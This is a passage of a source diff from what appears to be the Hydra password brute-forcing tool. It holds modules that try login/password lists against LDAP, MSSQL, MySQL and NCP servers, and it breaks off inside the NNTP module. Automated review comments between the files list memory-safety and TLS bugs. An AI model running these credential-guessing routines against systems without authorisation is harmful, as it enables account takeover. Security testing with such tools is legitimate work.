void service_ldap2(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ldap(ip, sp, options, miscptr, fp, port, 2, AUTH_CLEAR);
}
void service_ldap3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_CLEAR);
}
void service_ldap3_cram_md5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_CRAMMD5);
}
void service_ldap3_digest_md5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ldap(ip, sp, options, miscptr, fp, port, 3, AUTH_DIGESTMD5);
}
int service_ldap_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
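Review bot: the AUTH_CLEAR path in start_ldap computes `length = 14 + strlen(login) + strlen(pass);` and then memcpy()s both strings into `unsigned char buffer[512]` without checking that the total fits; only the SASL branch truncates its input, so a long login or password overflows the stack buffer. The same applies to the CRAM-MD5 second request, where login and buf2 are appended unchecked. The header bytes `buffer[1] = length - 2;`, `buffer[6] = length - 7;` and `buffer[11] = strlen(login);` are single-octet BER lengths, which are only valid up to 127, so the bind request is malformed well before 512 bytes; reject or skip pairs that exceed the short-form limit, or emit long-form lengths as the DIGEST-MD5 branch does. In the CRAM-MD5 step, `ptr = strstr((char *) buf, "<");` can be NULL and is passed straight to sasl_cram_md5(), and `if (buf2 == NULL)` tests a local array so it never fires. In service_ldap, `if ((hydra_connect_to_ssl(sock) == -1) && verbose)` only treats a TLS failure as fatal in verbose mode; without -v the else branch runs and the bind continues on a connection where TLS was not established. Drop `&& verbose` from the condition and keep it only around the message.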

BIN
hydra-logo.ico Normal file

Binary file not shown.

Size: 37 KiB

1
hydra-logo.rc Normal file

@ -0,0 +1 @@
1 ICON "hydra-logo.ico"

1278
hydra-mod.c Normal file

File diff suppressed because it is too large

61
hydra-mod.h Normal file

@ -0,0 +1,61 @@
#ifndef _HYDRA_MOD_H
#define _HYDRA_MOD_H
#include "hydra.h"
extern void hydra_child_exit(int code);
extern void hydra_register_socket(int s);
extern char *hydra_get_next_pair();
extern char *hydra_get_next_login();
extern char *hydra_get_next_password();
extern void hydra_completed_pair();
extern void hydra_completed_pair_found();
extern void hydra_completed_pair_skip();
extern void hydra_report_found(int port, char *svc, FILE * fp);
extern void hydra_report_pass_found(int port, char *ip, char *svc, FILE * fp);
extern void hydra_report_found_host(int port, char *ip, char *svc, FILE * fp);
extern void hydra_report_found_host_msg(int port, char *ip, char *svc, FILE * fp, char *msg);
extern void hydra_report_debug(FILE *st, char *format, ...);
extern int hydra_connect_to_ssl(int socket);
extern int hydra_connect_ssl(char *host, int port);
extern int hydra_connect_tcp(char *host, int port);
extern int hydra_connect_udp(char *host, int port);
extern int hydra_disconnect(int socket);
extern int hydra_data_ready(int socket);
extern int hydra_recv(int socket, char *buf, int length);
extern int hydra_recv_nb(int socket, char *buf, int length);
extern char *hydra_receive_line(int socket);
extern int hydra_send(int socket, char *buf, int size, int options);
extern int make_to_lower(char *buf);
extern unsigned char hydra_conv64(unsigned char in);
extern void hydra_tobase64(unsigned char *buf, int buflen, int bufsize);
extern void hydra_dump_asciihex(unsigned char *string, int length);
extern void hydra_set_srcport(int port);
extern char *hydra_address2string(char *address);
extern char *hydra_strcasestr(const char *haystack, const char *needle);
extern void hydra_dump_data(unsigned char *buf, int len, char *text);
extern int hydra_memsearch(char *haystack, int hlen, char *needle, int nlen);
extern char *hydra_strrep(char *string, char *oldpiece, char *newpiece);
#ifdef HAVE_PCRE
int hydra_string_match(char *str, const char *regex);
#endif
char *hydra_string_replace(const char *string, const char *substr, const char *replacement);
int debug;
int verbose;
int waittime;
int port;
int use_proxy;
int found;
char proxy_string_ip[36];
int proxy_string_port;
char proxy_string_type[10];
char *proxy_authentication;
char *cmdlinetarget;
typedef int BOOL;
#define hydra_report fprintf
#endif
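
Review bot: the globals at the end of this header (int debug; int verbose; int waittime; ... char *cmdlinetarget;) are written as definitions rather than extern declarations, so every file that includes the header emits its own copy and the build links only where the toolchain merges common symbols. Declare them extern here and define each one once in a single .c file. The prototypes with empty parentheses, such as hydra_get_next_login(), should be declared with (void) so the compiler can reject calls that pass stray arguments.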

168
hydra-mssql.c Normal file

@ -0,0 +1,168 @@
#include "hydra-mod.h"
#define MSLEN 30
extern char *HYDRA_EXIT;
char *buf;
unsigned char p_hdr[] =
"\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00";
unsigned char p_pk2[] =
"\x30\x30\x30\x30\x30\x30\x61\x30\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x20\x18\x81\xb8\x2c\x08\x03"
"\x01\x06\x0a\x09\x01\x01\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x73\x71\x75\x65\x6c\x64\x61"
"\x20\x31\x2e\x30\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00";
unsigned char p_pk3[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x04\x02\x00\x00\x4d\x53\x44"
"\x42\x4c\x49\x42\x00\x00\x00\x07\x06\x00\x00" "\x00\x00\x0d\x11\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00";
unsigned char p_lng[] =
"\x02\x01\x00\x47\x00\x00\x02\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x30\x30\x30\x00\x00" "\x00\x03\x00\x00\x00";
int start_mssql(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[1024];
char ms_login[MSLEN + 1];
char ms_pass[MSLEN + 1];
unsigned char len_login, len_pass;
int ret = -1;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (strlen(login) > MSLEN)
login[MSLEN - 1] = 0;
if (strlen(pass) > MSLEN)
pass[MSLEN - 1] = 0;
len_login = strlen(login);
len_pass = strlen(pass);
memset(ms_login, 0, MSLEN + 1);
memset(ms_pass, 0, MSLEN + 1);
strcpy(ms_login, login);
strcpy(ms_pass, pass);
memset(buffer, 0, sizeof(buffer));
memcpy(buffer, p_hdr, 39);
memcpy(buffer + 39, ms_login, MSLEN);
memcpy(buffer + MSLEN + 39, &len_login, 1);
memcpy(buffer + MSLEN + 1 + 39, ms_pass, MSLEN);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN, &len_pass, 1);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1, p_pk2, 110);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110, &len_pass, 1);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1, ms_pass, MSLEN);
memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1 + MSLEN, p_pk3, 270);
if (hydra_send(s, buffer, MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1 + MSLEN + 270, 0) < 0)
return 1;
if (hydra_send(s, (char *) p_lng, 71, 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret = hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
if (ret > 10 && buffer[8] == '\xe3') {
hydra_report_found_host(port, ip, "mssql", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
void service_mssql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_MSSQL, mysslport = PORT_MSSQL_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = start_mssql(sock, ip, port, options, miscptr, fp);
hydra_disconnect(sock);
break;
case 2: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_mssql_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
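
Review bot: in service_mssql, case 1 calls hydra_disconnect(sock) after start_mssql() without storing the result, so sock keeps the old descriptor and cases 2 and 3 (if (sock >= 0) sock = hydra_disconnect(sock);) disconnect it a second time; assign the return value in case 1 the way the exit cases do. In start_mssql, free(buf) is called on both return paths although buf is a file-scope pointer that this file never assigns, so those calls should be dropped. The truncation login[MSLEN - 1] = 0 (and the same for pass) writes into the string handed back by hydra_get_next_login() and cuts it to 29 characters rather than MSLEN; a length-bounded copy into ms_login and ms_pass would avoid both.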

429
hydra-mysql.c Normal file

@ -0,0 +1,429 @@
/* mysql 3.2x.x to 4.x support - by mcbethh (at) u-n-f (dot) com */
/* david (dot) maciejak (at) gmail (dot) com for using libmysqlclient-dev, adding support for mysql version 5.x */
#include "hydra-mod.h"
#ifndef HAVE_MATH_H
#include <stdio.h>
void dummy_mysql() {
printf("\n");
}
void service_mysql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
printf("\n");
}
#else
#include <math.h>
#define DEFAULT_DB "mysql"
#ifndef LIBMYSQLCLIENT
#else
#include <mysql/mysql.h>
MYSQL *mysql = NULL;
#endif
void hydra_hash_password(unsigned long *result, const char *password);
char *hydra_scramble(char *to, const char *message, const char *password);
extern int internal__hydra_recv(int socket, char *buf, int length);
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
char mysqlsalt[9];
/* modified hydra_receive_line, I've striped code which changed every 0x00 to 0x20 */
char *hydra_mysql_receive_line(int socket) {
char buf[300], *buff, *buff2;
int i = 0, j = 0;
buff = malloc(sizeof(buf));
if (buff == NULL)
return NULL;
memset(buff, 0, sizeof(buf));
i = hydra_data_ready_timed(socket, (long) waittime, 0);
if (i > 0) {
if ((i = internal__hydra_recv(socket, buff, sizeof(buf))) < 0) {
free(buff);
return NULL;
}
}
if (i <= 0) {
if (debug)
hydra_report_debug(stderr, "DEBUG_RECV_BEGIN|%s|END\n", buff);
free(buff);
return NULL;
}
j = 1;
while (hydra_data_ready(socket) > 0 && j > 0) {
j = internal__hydra_recv(socket, buf, sizeof(buf));
if ((buff2 = realloc(buff, i + j)) == NULL) {
free(buff);
return NULL;
} else
buff = buff2;
memcpy(buff + i, &buf, j);
i = i + j;
}
if (debug)
hydra_report_debug(stderr, "DEBUG_RECV_BEGIN|%s|END\n", buff);
return buff;
}
/* check if valid mysql protocol, mysql version and read salt */
char hydra_mysql_init(int sock) {
char *server_version, *pos, *buf;
unsigned char protocol;
buf = hydra_mysql_receive_line(sock);
if (buf == NULL)
return 1;
protocol = buf[4];
if (protocol == 0xff) {
pos = &buf[6];
// *(strchr(pos, '.')) = '\0';
hydra_report(stderr, "[ERROR] %s\n", pos);
free(buf);
return 2;
}
if (protocol <= 10) {
free(buf);
return 2;
}
if (protocol > 10) {
fprintf(stderr, "[INFO] This is protocol version %d, only v10 is supported, not sure if it will work\n", protocol);
}
server_version = &buf[5];
pos = buf + strlen(server_version) + 10;
memcpy(mysqlsalt, pos, 9);
if (!strstr(server_version, "3.") && !strstr(server_version, "4.") && strstr(server_version, "5.")) {
#ifndef LIBMYSQLCLIENT
hydra_report(stderr, "[ERROR] Not an MySQL protocol or unsupported version,\ncheck configure to see if libmysql is found\n");
#endif
free(buf);
return 2;
}
free(buf);
return 0;
}
/* prepare response to server greeting */
char *hydra_mysql_prepare_auth(char *login, char *pass) {
unsigned char *response;
unsigned long login_len = strlen(login) > 32 ? 32 : strlen(login);
unsigned long response_len = 4 /* header */ +
2 /* client flags */ +
3 /* max packet len */ +
login_len + 1 + 8 /* scrambled password len */ ;
response = (unsigned char *) malloc(response_len + 4);
if (response == NULL) {
fprintf(stderr, "[ERROR] could not allocate memory\n");
return NULL;
}
memset(response, 0, response_len + 4);
*((unsigned long *) response) = response_len - 4;
response[3] = 0x01; /* packet number */
response[4] = 0x85;
response[5] = 0x24; /* client flags */
response[6] = response[7] = response[8] = 0x00; /* max packet */
memcpy(&response[9], login, login_len); /* login */
response[9 + login_len] = '\0'; /* null terminate login */
hydra_scramble((char *) &response[9 + login_len + 1], mysqlsalt, pass);
return (char *) response;
}
/* returns 0 if authentication succeed */
/* and 1 if failed */
char hydra_mysql_parse_response(unsigned char *response) {
unsigned long response_len = *((unsigned long *) response) & 0xffffff;
if (response_len < 4)
return 0;
if (response[4] == 0xff)
return 1;
return 0;
}
char hydra_mysql_send_com_quit(int sock) {
char com_quit_packet[5] = { 0x01, 0x00, 0x00, 0x00, 0x01 };
hydra_send(sock, com_quit_packet, 5, 0);
return 0;
}
int start_mysql(int sock, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *response = NULL, *login = NULL, *pass = NULL;
unsigned long response_len;
char res = 0;
char database[256];
login = hydra_get_next_login();
pass = hydra_get_next_password();
if (miscptr)
strncpy(database, miscptr, sizeof(database));
else {
strncpy(database, DEFAULT_DB, sizeof(database));
if (verbose)
hydra_report(stderr, "[VERBOSE] using default db 'mysql'\n");
}
/* read server greeting */
res = hydra_mysql_init(sock);
if (res == 2) {
/* old reversing protocol trick did not work */
/* try using the libmysql client if available */
hydra_mysql_send_com_quit(sock);
sock = hydra_disconnect(sock);
#ifdef LIBMYSQLCLIENT
if (mysql == NULL) {
mysql = mysql_init(NULL);
if (mysql == NULL) {
hydra_report(stderr, "[ERROR] Insufficient memory to allocate new mysql object\n");
return 1;
}
}
/*mysql_options(&mysql,MYSQL_OPT_COMPRESS,0); */
if (!mysql_real_connect(mysql, hydra_address2string(ip), login, pass, database, 0, NULL, 0)) {
int my_errno = mysql_errno(mysql);
if (debug)
hydra_report(stderr, "[ERROR] Failed to connect to database: %s\n", mysql_error(mysql));
/*
Error: 1049 SQLSTATE: 42000 (ER_BAD_DB_ERROR)
Message: Unknown database '%s'
*/
if (my_errno == 1049) {
hydra_report(stderr, "[ERROR] Unknown database: %s\n", database);
}
if (my_errno == 1251) {
hydra_report(stderr, "[ERROR] Client does not support authentication protocol requested by server\n");
}
/*
http://dev.mysql.com/doc/refman/5.0/en/error-messages-server.html
Error: 1044 SQLSTATE: 42000 (ER_DBACCESS_DENIED_ERROR)
Message: Access denied for user '%s'@'%s' to database '%s'
Error: 1045 SQLSTATE: 28000 (ER_ACCESS_DENIED_ERROR)
Message: Access denied for user '%s'@'%s' (using password: %s)
*/
//if the error is more critical, we just try to reconnect
//to the db later with the mysql_init
if ((my_errno != 1044) && (my_errno != 1045)) {
mysql_close(mysql);
mysql = NULL;
}
return 3;
}
hydra_report_found_host(port, ip, "mysql", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
mysql_close(mysql);
mysql = NULL;
return 3;
}
return 1;
#else
hydra_child_exit(2);
#endif
}
if (res == 1)
return 1;
/* prepare client authentication packet */
response = hydra_mysql_prepare_auth(login, pass);
if (response == NULL)
return 3;
response_len = *((unsigned long *) response) & 0xffffff;
/* send client auth packet */
/* dunny why, mysql IO code had problem reading my response. */
/* When I send response_len bytes, it always read response_len-4 bytes */
/* I fixed it just by sending 4 characters more. It is maybe not good */
/* coding style, but working :) */
if (hydra_send(sock, response, response_len + 4, 0) < 0) {
free(response);
return 1;
}
free(response);
/* read authentication response */
if ((response = hydra_mysql_receive_line(sock)) == NULL)
return 1;
res = hydra_mysql_parse_response((unsigned char *) response);
if (!res) {
hydra_mysql_send_com_quit(sock);
sock = hydra_disconnect(sock);
hydra_report_found_host(port, ip, "mysql", fp);
hydra_completed_pair_found();
free(response);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
free(response);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
/* each try requires new connection */
return 1;
}
void service_mysql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_MYSQL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0) {
hydra_mysql_send_com_quit(sock);
sock = hydra_disconnect(sock);
}
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_mysql(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0) {
hydra_mysql_send_com_quit(sock);
sock = hydra_disconnect(sock);
}
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#ifndef LIBMYSQLCLIENT
#endif
/************************************************************************/
/* code belowe is copied from mysql 3.23.57 source code (www.mysql.com) */
/* and slightly modified (removed not needed parts of code, changed */
/* data types) */
/************************************************************************/
struct hydra_rand_struct {
unsigned long seed1, seed2, max_value;
double max_value_dbl;
};
void hydra_randominit(struct hydra_rand_struct *rand_st, unsigned long seed1, unsigned long seed2) { /* For mysql 3.21.# */
rand_st->max_value = 0x3FFFFFFFL;
rand_st->max_value_dbl = (double) rand_st->max_value;
rand_st->seed1 = seed1 % rand_st->max_value;
rand_st->seed2 = seed2 % rand_st->max_value;
}
double hydra_rnd(struct hydra_rand_struct *rand_st) {
rand_st->seed1 = (rand_st->seed1 * 3 + rand_st->seed2) % rand_st->max_value;
rand_st->seed2 = (rand_st->seed1 + rand_st->seed2 + 33) % rand_st->max_value;
return (((double) rand_st->seed1) / rand_st->max_value_dbl);
}
void hydra_hash_password(unsigned long *result, const char *password) {
register unsigned long nr = 1345345333L, add = 7, nr2 = 0x12345671L;
unsigned long tmp;
for (; *password; password++) {
if (*password == ' ' || *password == '\t')
continue; /* skipp space in password */
tmp = (unsigned long) (unsigned char) *password;
nr ^= (((nr & 63) + add) * tmp) + (nr << 8);
nr2 += (nr2 << 8) ^ nr;
add += tmp;
}
result[0] = nr & (((unsigned long) 1L << 31) - 1L); /* Don't use sign bit (str2int) */ ;
result[1] = nr2 & (((unsigned long) 1L << 31) - 1L);
return;
}
char *hydra_scramble(char *to, const char *message, const char *password) {
struct hydra_rand_struct rand_st;
unsigned long hash_pass[2], hash_message[2];
char extra;
if (password && password[0]) {
char *to_start = to;
hydra_hash_password(hash_pass, password);
hydra_hash_password(hash_message, message);
hydra_randominit(&rand_st, hash_pass[0] ^ hash_message[0], hash_pass[1] ^ hash_message[1]);
while (*message++)
*to++ = (char) (floor(hydra_rnd(&rand_st) * 31) + 64);
extra = (char) (floor(hydra_rnd(&rand_st) * 31));
while (to_start != to)
*(to_start++) ^= extra;
}
*to = 0;
return to;
}
#endif
int service_mysql_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
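
Review bot: hydra_mysql_prepare_auth() and hydra_mysql_parse_response() write and read the packet length through *((unsigned long *) response), which is 8 bytes wide on LP64 builds and depends on host byte order, while the code itself treats the header as three length bytes (the & 0xffffff mask) followed by a packet number (response[3] = 0x01); encode and decode those three bytes explicitly. hydra_mysql_parse_response() also returns 0, the value its comment documents as success, when response_len < 4, so a short or truncated reply is reported as a valid login. In hydra_mysql_init(), memcpy(mysqlsalt, pos, 9) runs without checking that pos lies inside the received data, and hydra_scramble() then walks mysqlsalt with while (*message++), which stops inside the 9-byte array only if one of the copied bytes is zero.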

197
hydra-ncp.c Normal file

@ -0,0 +1,197 @@
/*
* Novell Network Core Protocol Support - by David Maciejak @ GMAIL dot com
* Tested on Netware 6.5
*
* you need to install libncp and libncp-dev (tested with version 2.2.6-3)
*
* you can passed full context as OPT
*
* example: ./hydra -L login -P passw 172.16.246.129 ncp .O=cx
*
*/
#include "hydra-mod.h"
#ifndef LIBNCP
void dummy_ncp() {
printf("\n");
}
#else
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ncp/nwcalls.h>
extern char *HYDRA_EXIT;
extern int child_head_no;
typedef struct __NCP_DATA {
struct ncp_conn_spec spec;
struct ncp_conn *conn;
char *context;
} _NCP_DATA;
//uncomment line below to see more trace stack
//#define NCP_DEBUG
int start_ncp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *login;
char *pass;
char context[256];
unsigned int ncp_lib_error_code;
char *empty = "";
int object_type = NCP_BINDERY_USER;
_NCP_DATA *session;
session = malloc(sizeof(_NCP_DATA));
memset(session, 0, sizeof(_NCP_DATA));
login = empty;
pass = empty;
if (strlen(login = hydra_get_next_login()) == 0) {
login = empty;
} else {
if (miscptr) {
if (strlen(miscptr) + strlen(login) > sizeof(context)) {
free(session);
return 4;
}
memset(context, 0, sizeof(context));
strncpy(context, login, strlen(login));
strncpy(context + strlen(login), miscptr, sizeof(miscptr) + 1);
login = context;
}
}
//login and password are case insensitive
//str_upper(login);
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
ncp_lib_error_code = ncp_find_conn_spec3(hydra_address2string(ip), login, "", 1, getuid(), 0, &session->spec);
if (ncp_lib_error_code) {
free(session);
return 1;
}
ncp_lib_error_code = NWCCOpenConnByName(NULL, session->spec.server, NWCC_NAME_FORMAT_BIND, NWCC_OPEN_NEW_CONN, NWCC_RESERVED, &session->conn);
if (ncp_lib_error_code) {
free(session);
return 1;
}
memset(session->spec.password, 0, sizeof(session->spec.password));
memcpy(session->spec.password, pass, strlen(pass) + 1);
//str_upper(session->spec.password);
ncp_lib_error_code = ncp_login_conn(session->conn, session->spec.user, object_type, session->spec.password);
switch (ncp_lib_error_code & 0x0000FFFF) {
case 0x0000: /* Success */
#ifdef NCP_DEBUG
printf("Connection success (%s / %s). Error code: %X\n", login, pass, ncp_lib_error_code);
#endif
ncp_close(session->conn);
hydra_report_found_host(port, ip, "ncp", fp); //ok
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3; //exit
free(session);
return 2; //next
break;
case 0x89DE: /* PASSWORD INVALID */
case 0x89F0: /* BIND WILDCARD INVALID */
case 0x89FF: /* NO OBJ OR BAD PASSWORD */
case 0xFD63: /* FAILED_AUTHENTICATION */
case 0xFDA7: /* NO_SUCH_ENTRY */
#ifdef NCP_DEBUG
printf("Incorrect password (%s / %s). Error code: %X\n", login, pass, ncp_lib_error_code);
#endif
ncp_close(session->conn);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
free(session);
return 2; //next
}
break;
default:
#ifdef NCP_DEBUG
printf("Failed to open connection. Error code: %X\n", ncp_lib_error_code);
#endif
if (session->conn != NULL)
ncp_close(session->conn);
break;
}
free(session);
return 1; //reconnect
}
void service_ncp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_NCP;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
/*
* Here we start the password cracking process
*/
next_run = start_ncp(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4:
if (child_head_no == 0)
fprintf(stderr, "[ERROR] Optional parameter too long!\n");
hydra_child_exit(0);
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_ncp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
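
Review bot: in start_ncp the context is assembled with strncpy(context + strlen(login), miscptr, sizeof(miscptr) + 1), and sizeof(miscptr) is the size of the pointer, not the length of the option string, so a longer context is silently cut off. The guard before it, strlen(miscptr) + strlen(login) > sizeof(context), still admits a combined length equal to sizeof(context) and leaves no room for the terminator; compare with >= and copy strlen(miscptr) + 1 bytes. The malloc() result for session is passed to memset() unchecked, and the success path returns 3 without free(session).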

475
hydra-nntp.c Normal file

@ -0,0 +1,475 @@
#include "hydra-mod.h"
#include "sasl.h"
/*
Based on:
RFC 3977: Network News Transfer Protocol (NNTP)
RFC 4643: Network News Transfer Protocol (NNTP) Extension for Authentication
*/
int nntp_auth_mechanism = AUTH_CLEAR;
extern char *HYDRA_EXIT;
char *buf;
char *nntp_read_server_capacity(int sock) {
char *ptr = NULL;
int resp = 0;
char *buf = NULL;
do {
if (buf != NULL)
free(buf);
ptr = buf = hydra_receive_line(sock);
if (buf != NULL) {
if (isdigit((int) buf[0]) && buf[3] == ' ')
resp = 1;
else {
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
#ifdef NO_RINDEX
if ((ptr = strrchr(buf, '\n')) != NULL) {
#else
if ((ptr = rindex(buf, '\n')) != NULL) {
#endif
ptr++;
if (isdigit((int) *ptr) && *(ptr + 3) == ' ')
resp = 1;
}
}
}
} while (buf != NULL && resp == 0);
return buf;
}
int start_nntp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"";
char *login, *pass, buffer[300], buffer2[500];
int i = 1;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
